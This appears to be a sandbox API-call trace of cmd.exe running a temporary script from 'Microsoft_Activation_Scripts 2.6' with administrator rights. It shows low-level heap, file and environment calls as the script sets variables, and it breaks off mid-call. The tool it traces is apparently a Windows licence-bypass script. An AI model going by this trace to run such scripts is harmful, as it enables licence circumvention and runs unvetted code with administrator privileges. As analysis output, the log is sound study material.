0x19a8f1e0f30 [0175.801] GetProcessHeap () returned 0x19a8f1e0000 [0175.801] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0f30) returned 0x2e [0175.801] wcsncmp (_String1="\"nul", _String2="/", _MaxCount=0x4) returned -13 [0175.801] GetProcessHeap () returned 0x19a8f1e0000 [0175.801] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x36) returned 0x19a8f1e0c70 [0175.801] _wcsnicmp (_String1="\"n", _String2="/A", _MaxCount=0x2) returned -13 [0175.801] _wcsnicmp (_String1="\"n", _String2="/P", _MaxCount=0x2) returned -13 [0175.801] SetEnvironmentVariableW (lpName="nul6", lpValue="2^>nul") returned 1 [0175.801] GetProcessHeap () returned 0x19a8f1e0000 [0175.802] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0175.802] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0175.802] GetProcessHeap () returned 0x19a8f1e0000 [0175.802] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb80) returned 0x19a8f1ef6e0 [0175.802] memcpy (in: _Dst=0x19a8f1ef6e0, _Src=0x19a8f1eeb50, _Size=0xb80 | out: _Dst=0x19a8f1ef6e0) returned 0x19a8f1ef6e0 [0175.802] FreeEnvironmentStringsA (penv="=") returned 1 [0175.802] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.802] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.802] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.802] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.803] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.803] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.803] SetConsoleInputExeNameW () returned 0x1 [0175.803] GetConsoleOutputCP () returned 0x1b5 [0175.803] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.804] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.804] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.804] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.804] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.804] SetFilePointer (in: hFile=0x90, lDistanceToMove=3429, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd65 [0175.804] GetProcessHeap () returned 0x19a8f1e0000 [0175.805] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0c70) returned 1 [0175.805] GetProcessHeap () returned 0x19a8f1e0000 [0175.805] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0f30) returned 1 [0175.805] GetProcessHeap () returned 0x19a8f1e0000 [0175.805] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e09b0) returned 1 [0175.805] GetProcessHeap () returned 0x19a8f1e0000 [0175.805] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecbc0) returned 1 [0175.805] GetProcessHeap () returned 0x19a8f1e0000 [0175.806] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0175.806] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.806] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd65 [0175.806] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.806] SetFilePointer (in: hFile=0x90, lDistanceToMove=3450, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd7a [0175.806] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"nul=>nul 2>&1\"\r\n", cbMultiByte=21, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"nul=>nul 2>&1\"\r\n=====================================================================================================================\r\n") returned 21 [0175.806] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.806] GetFileType (hFile=0x90) returned 0x1 [0175.806] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.806] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd7a [0175.806] GetProcessHeap () returned 0x19a8f1e0000 [0175.806] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fd1c0 [0175.806] GetProcessHeap () returned 0x19a8f1e0000 [0175.807] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fd1c0) returned 1 [0175.807] _wcsicmp (_String1="set", _String2=")") returned 74 [0175.807] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0175.807] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0175.807] _wcsicmp (_String1="IF", _String2="set") returned -10 [0175.807] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0175.807] _wcsicmp (_String1="REM", _String2="set") returned -1 [0175.807] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0175.807] GetProcessHeap () returned 0x19a8f1e0000 [0175.807] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0175.807] GetProcessHeap () returned 0x19a8f1e0000 [0175.807] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec9c0 [0175.807] GetProcessHeap () returned 0x19a8f1e0000 [0175.807] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x32) returned 0x19a8f1e0df0 [0175.807] _tell (_FileHandle=3) returned 3450 [0175.807] _close (_FileHandle=3) returned 0 [0175.807] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.807] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.807] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.807] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.807] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.807] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.808] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.808] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.808] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.808] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.808] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.808] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0175.808] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.808] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.808] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.808] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.808] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.808] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.808] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.808] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.808] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.808] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.808] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.808] GetProcessHeap () returned 0x19a8f1e0000 [0175.808] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x54) returned 0x19a8f1f89a0 [0175.809] GetProcessHeap () returned 0x19a8f1e0000 [0175.809] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f89a0, Size=0x32) returned 0x19a8f1e0970 [0175.809] GetProcessHeap () returned 0x19a8f1e0000 [0175.809] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0970) returned 0x32 [0175.809] wcsncmp (_String1="\"nul", _String2="/", _MaxCount=0x4) returned -13 [0175.809] GetProcessHeap () returned 0x19a8f1e0000 [0175.809] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3a) returned 0x19a8f1f9090 [0175.809] _wcsnicmp (_String1="\"n", _String2="/A", _MaxCount=0x2) returned -13 [0175.809] _wcsnicmp (_String1="\"n", _String2="/P", _MaxCount=0x2) returned -13 [0175.809] SetEnvironmentVariableW (lpName="nul", lpValue=">nul 2>&1") returned 1 [0175.809] GetProcessHeap () returned 0x19a8f1e0000 [0175.809] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef6e0) returned 1 [0175.809] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0175.809] GetProcessHeap () returned 0x19a8f1e0000 [0175.809] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb9c) returned 0x19a8f1eeb50 [0175.809] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xb9c | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0175.810] FreeEnvironmentStringsA (penv="=") returned 1 [0175.810] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.810] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.810] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.810] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.810] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.810] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.811] SetConsoleInputExeNameW () returned 0x1 [0175.811] GetConsoleOutputCP () returned 0x1b5 [0175.811] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.811] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.812] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.812] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.812] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.812] SetFilePointer (in: hFile=0x90, lDistanceToMove=3450, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd7a [0175.812] GetProcessHeap () returned 0x19a8f1e0000 [0175.812] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9090) returned 1 [0175.812] GetProcessHeap () returned 0x19a8f1e0000 [0175.813] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0970) returned 1 [0175.816] GetProcessHeap () returned 0x19a8f1e0000 [0175.817] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0df0) returned 1 [0175.817] GetProcessHeap () returned 0x19a8f1e0000 [0175.817] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec9c0) returned 1 [0175.817] GetProcessHeap () returned 0x19a8f1e0000 [0175.817] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0175.818] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.818] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd7a [0175.818] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.818] SetFilePointer (in: hFile=0x90, lDistanceToMove=3452, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd7c [0175.818] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nt \"nul=>nul 2>&1\"\r\n=====================================================================================================================\r\n") returned 2 [0175.818] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.818] GetFileType (hFile=0x90) returned 0x1 [0175.819] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.819] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd7c [0175.819] GetProcessHeap () returned 0x19a8f1e0000 [0175.819] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd70 [0175.819] GetProcessHeap () returned 0x19a8f1e0000 [0175.820] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd70) returned 1 [0175.820] _tell (_FileHandle=3) returned 3452 [0175.820] _close (_FileHandle=3) returned 0 [0175.820] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.821] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.821] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.821] SetFilePointer (in: hFile=0x90, lDistanceToMove=3452, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd7c [0175.821] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.821] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd7c [0175.821] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.822] SetFilePointer (in: hFile=0x90, lDistanceToMove=3468, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd8c [0175.822] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set winbuild=1\r\n", cbMultiByte=16, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set winbuild=1\r\n&1\"\r\n=====================================================================================================================\r\n") returned 16 [0175.822] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.822] GetFileType (hFile=0x90) returned 0x1 [0175.822] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.822] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd8c [0175.822] GetProcessHeap () returned 0x19a8f1e0000 [0175.822] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd70 [0175.822] GetProcessHeap () returned 0x19a8f1e0000 [0175.823] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd70) returned 1 [0175.823] _wcsicmp (_String1="set", _String2=")") returned 74 [0175.823] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0175.823] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0175.823] _wcsicmp (_String1="IF", _String2="set") returned -10 [0175.823] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0175.823] _wcsicmp (_String1="REM", _String2="set") returned -1 [0175.823] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0175.823] GetProcessHeap () returned 0x19a8f1e0000 [0175.823] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0175.823] GetProcessHeap () returned 0x19a8f1e0000 [0175.823] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec820 [0175.824] GetProcessHeap () returned 0x19a8f1e0000 [0175.824] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb9e0 [0175.824] _tell (_FileHandle=3) returned 3468 [0175.824] _close (_FileHandle=3) returned 0 [0175.824] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.824] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.824] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.824] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.824] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.824] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.824] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.824] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.824] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.824] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.824] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.824] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0175.825] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.825] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.825] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.825] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.825] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.825] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.825] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.825] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.825] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.825] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.825] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.825] GetProcessHeap () returned 0x19a8f1e0000 [0175.825] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f9310 [0175.825] GetProcessHeap () returned 0x19a8f1e0000 [0175.825] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f9310, Size=0x28) returned 0x19a8f1eb860 [0175.825] GetProcessHeap () returned 0x19a8f1e0000 [0175.825] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb860) returned 0x28 [0175.825] wcsncmp (_String1="winb", _String2="/", _MaxCount=0x4) returned 72 [0175.825] GetProcessHeap () returned 0x19a8f1e0000 [0175.825] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0ff0 [0175.825] _wcsnicmp (_String1="wi", _String2="/A", _MaxCount=0x2) returned 72 [0175.825] _wcsnicmp (_String1="wi", _String2="/P", _MaxCount=0x2) returned 72 [0175.825] SetEnvironmentVariableW (lpName="winbuild", lpValue="1") returned 1 [0175.825] GetProcessHeap () returned 0x19a8f1e0000 [0175.826] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0175.826] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0175.826] GetProcessHeap () returned 0x19a8f1e0000 [0175.826] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xbb2) returned 0x19a8f1ef710 [0175.826] memcpy (in: _Dst=0x19a8f1ef710, _Src=0x19a8f1eeb50, _Size=0xbb2 | out: _Dst=0x19a8f1ef710) returned 0x19a8f1ef710 [0175.826] FreeEnvironmentStringsA (penv="=") returned 1 [0175.826] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.826] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.826] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.826] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.827] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.827] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.827] SetConsoleInputExeNameW () returned 0x1 [0175.827] GetConsoleOutputCP () returned 0x1b5 [0175.828] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.828] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.828] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0175.828] _open_osfhandle (_OSFileHandle=0x90, _Flags=8) returned 3 [0175.828] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.828] SetFilePointer (in: hFile=0x90, lDistanceToMove=3468, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd8c [0175.829] GetProcessHeap () returned 0x19a8f1e0000 [0175.829] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0ff0) returned 1 [0175.829] GetProcessHeap () returned 0x19a8f1e0000 [0175.829] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0175.829] GetProcessHeap () returned 0x19a8f1e0000 [0175.830] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0175.830] GetProcessHeap () returned 0x19a8f1e0000 [0175.830] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec820) returned 1 [0175.830] GetProcessHeap () returned 0x19a8f1e0000 [0175.830] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0175.830] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.830] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd8c [0175.830] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.831] SetFilePointer (in: hFile=0x90, lDistanceToMove=3492, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xda4 [0175.831] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set psc=powershell.exe\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set psc=powershell.exe\r\n==================================================================================================================\r\n") returned 24 [0175.831] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.831] GetFileType (hFile=0x90) returned 0x1 [0175.831] _get_osfhandle (_FileHandle=3) returned 0x90 [0175.831] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xda4 [0175.831] GetProcessHeap () returned 0x19a8f1e0000 [0175.831] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fd1c0 [0175.831] GetProcessHeap () returned 0x19a8f1e0000 [0175.831] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fd1c0) returned 1 [0175.831] _wcsicmp (_String1="set", _String2=")") returned 74 [0175.831] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0175.831] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0175.832] _wcsicmp (_String1="IF", _String2="set") returned -10 [0175.832] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0175.832] _wcsicmp (_String1="REM", _String2="set") returned -1 [0175.832] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0175.832] GetProcessHeap () returned 0x19a8f1e0000 [0175.832] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0175.832] GetProcessHeap () returned 0x19a8f1e0000 [0175.832] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecb60 [0175.832] GetProcessHeap () returned 0x19a8f1e0000 [0175.832] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0930 [0175.832] _tell (_FileHandle=3) returned 3492 [0175.832] _close (_FileHandle=3) returned 0 [0175.832] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.832] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.832] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.832] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.832] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.832] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.832] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.832] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.832] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.832] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.832] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.832] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0175.834] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0175.834] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0175.834] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0175.834] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0175.834] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0175.834] _wcsicmp (_String1="set", _String2="CD") returned 16 [0175.834] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0175.834] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0175.834] _wcsicmp (_String1="set", _String2="REN") returned 1 [0175.834] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0175.834] _wcsicmp (_String1="set", _String2="SET") returned 0 [0175.834] GetProcessHeap () returned 0x19a8f1e0000 [0175.834] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x60) returned 0x19a8f1eaed0 [0175.834] GetProcessHeap () returned 0x19a8f1e0000 [0175.834] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eaed0, Size=0x38) returned 0x19a8f1eaed0 [0175.834] GetProcessHeap () returned 0x19a8f1e0000 [0175.834] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaed0) returned 0x38 [0175.834] wcsncmp (_String1="psc", _String2="/", _MaxCount=0x4) returned 65 [0175.834] GetProcessHeap () returned 0x19a8f1e0000 [0175.834] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f9590 [0175.834] _wcsnicmp (_String1="ps", _String2="/A", _MaxCount=0x2) returned 65 [0175.834] _wcsnicmp 